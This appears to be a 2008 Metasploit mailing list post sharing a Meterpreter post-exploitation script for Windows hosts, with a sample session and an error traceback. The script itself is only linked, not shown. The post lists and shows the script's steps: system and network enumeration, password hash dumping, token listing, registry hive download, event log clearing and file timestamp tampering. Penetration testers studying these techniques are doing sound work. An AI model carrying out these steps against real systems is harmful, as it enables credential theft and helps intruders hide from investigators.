Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Script for automating Information Gathering in windows Hosts

From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Sun, 14 Dec 2008 21:18:46 +0000
Hi

   Guys just re-wrote a script I wrote during an engagement inspired by the
scraper.rb script by Muts, and thought I would share it with you guys. Sadly
I'm getting the same error as Natron when running my script with
AutoRunScript. at the end of the email is the error I'm getting in
.msf3/log/framework.log.

http://www.darkoperator.com/winenum2.rb.tar.gz

The script has to be placed in the scripts/meterpreter/ folder in the root
of the metasploit folder in order to use it.
The script will do the following,

Execute on the host and get the output for:

    * set
    * arp -a
    * ipconfig /all
    * ipconfig /displaydns
    * route print
    * net view
    * netstat -na
    * netstat -ns
    * net share
    * net view
    * net group
    * net user
    * net localgroup
    * net view /domain
    * tasklist /svc
    * netsh firewall show config
    * wmic computersystem list
    * wmic useraccount list
    * wmic group
    * wmic service list brief
    * wmic volume list brief
    * wmic process list brief
    * wmic startup list full
    * wmic qfe

It will also :
    * Check if the target machine is a VMware or Virtual Box VM
    * Run meterpreter hashdump
    * List all tokens on the server that can be used with Incognito
    * export, compress and download all registry hives
    * Clear all event logs (optional)
    * Change the MACE of the executables used on the host.(optional)

Here is some output from meterpreter

meterpreter > run winenum2
Windows Local Enumerion Meterpreter Script by Darkoperator
Carlos Perez carlos_perez at darkoperator.com
Usage:

-h    This help message.

-a    Run all commands including clearing event log and changing the
      Changing Access Time, Modified Time and Created Time of executables
      that where run on the target machine

-m    Run all commands minus clearing the event logs and changing the MACE
      of executables that where run in the target machine.
meterpreter >
meterpreter > run winenum2 -a
[*] Running Windows Local Enumeration Meterpreter Script by Darkoperator
[*] New session on 10.10.10.23:1149...
[*] Saving report to /tmp/10.10.10.23_20081130.270505021
[*] Checking if WINXPVM01 is a Virtual Machine ........
[*]     This is a VMWare virtual Machine
[*] Running Command List ...
[*]     running command cmd.exe /c set
[*]     running command arp -a
[*]     running command ipconfig /all
[*]     running command ipconfig /displaydns
[*]     running command route print
[*]     running command net view
[*]     running command netstat -na
[*]     running command netstat -ns
[*]     running command net share
[*]     running command net group
[*]     running command net user
[*]     running command net localgroup
[*]     running command net view /domain
[*]     running command netsh firewall show config
[*]     running command tasklist /svc
[*] Running WMIC Commands ....
[*]     running command wimic computersystem list
[*]     running command wimic useraccount list
[*]     running command wimic group
[*]     running command wimic service list brief
[*]     running command wimic volume list brief
[*]     running command wimic process list brief
[*]     running command wimic startup list full
[*]     running command wimic qfe
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Dumping and Downloading the Registry
[*]     Exporting HKCU
[*]     Compressing HKCU into cab file for faster download
[*]     Exporting HKLM
[*]     Compressing HKLM into cab file for faster download
[*]     Exporting HKCC
[*]     Compressing HKCC into cab file for faster download
[*]     Exporting HKCR
[*]     Compressing HKCR into cab file for faster download
[*]     Exporting HKU
[*]     Compressing HKU into cab file for faster download
[*]     Downloading HKCU.cab to -> /tmp/HKCU.cab
[*]     Downloading HKLM.cab to -> /tmp/HKLM.cab
[*]     Downloading HKCC.cab to -> /tmp/HKCC.cab
[*]     Downloading HKCR.cab to -> /tmp/HKCR.cab
[*]     Downloading HKU.cab to -> /tmp/HKU.cab
[*]     Deleting left over files
[*] Clearing Event Logs, this will leave and event 517
[*]     Clearing the security Event Log
[*]     Clearing the system Event Log
[*]     Clearing the application Event Log
[*]     Clearing the directory service Event Log
[*]     Clearing the dns server Event Log
[*]     Clearing the file replication service Event Log
[*] Alll Event Logs have been cleared
[*] Changing Access Time, Modified Time and Created Time of Files Used
[*]     Changing file MACE attributes on C:\WINDOWS\system32\cmd.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\reg.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\ipconfig.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\route.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\net.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\netstat.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\netsh.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\makecab.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\tasklist.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\wbem\wmic.exe
[*] Done!


-----------------Error when running in AutoRunScript
--------------------------------------

[12/14/2008 17:04:14] [e(0)] core: Exception raised from handle_connection:
undefined local variable or method `client' for
#<#<Class:0xb65748cc>:0xb6214c18>

/pentest/exploits/framework3/lib/rex/script.rb:35:in `eval'
(eval):474:in `on_session'
(eval):88:in `on_session'
/pentest/exploits/framework3/lib/msf/core/handler.rb:202:in `create_session'
/pentest/exploits/framework3/lib/msf/core/payload/stager.rb:128:in
`handle_connection_stage'
/pentest/exploits/framework3/lib/msf/core/payload/windows/dllinject.rb:231:in
`handle_connection_stage'
/pentest/exploits/framework3/lib/msf/core/payload/stager.rb:119:in
`handle_connection'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:129:in
`start_handler'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:127:in
`initialize'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:127:in
`new'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:127:in
`start_handler'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:107:in
`initialize'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:107:in
`new'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:107:in
`start_handler'
/pentest/exploits/framework3/lib/msf/core/exploit.rb:401:in `setup'
/pentest/exploits/framework3/lib/msf/core/exploit_driver.rb:173:in
`job_run_proc'
/pentest/exploits/framework3/lib/msf/core/exploit_driver.rb:144:in `run'
/pentest/exploits/framework3/lib/msf/base/simple/exploit.rb:121:in
`exploit_simple'
/pentest/exploits/framework3/lib/msf/base/simple/exploit.rb:142:in
`exploit_simple'
/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:118:in
`cmd_exploit'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'
/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:127:in `run'
./msfconsole:78
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081214/efe66725/attachment.htm>
Previous By Date Next
Previous By Thread Next

Current thread: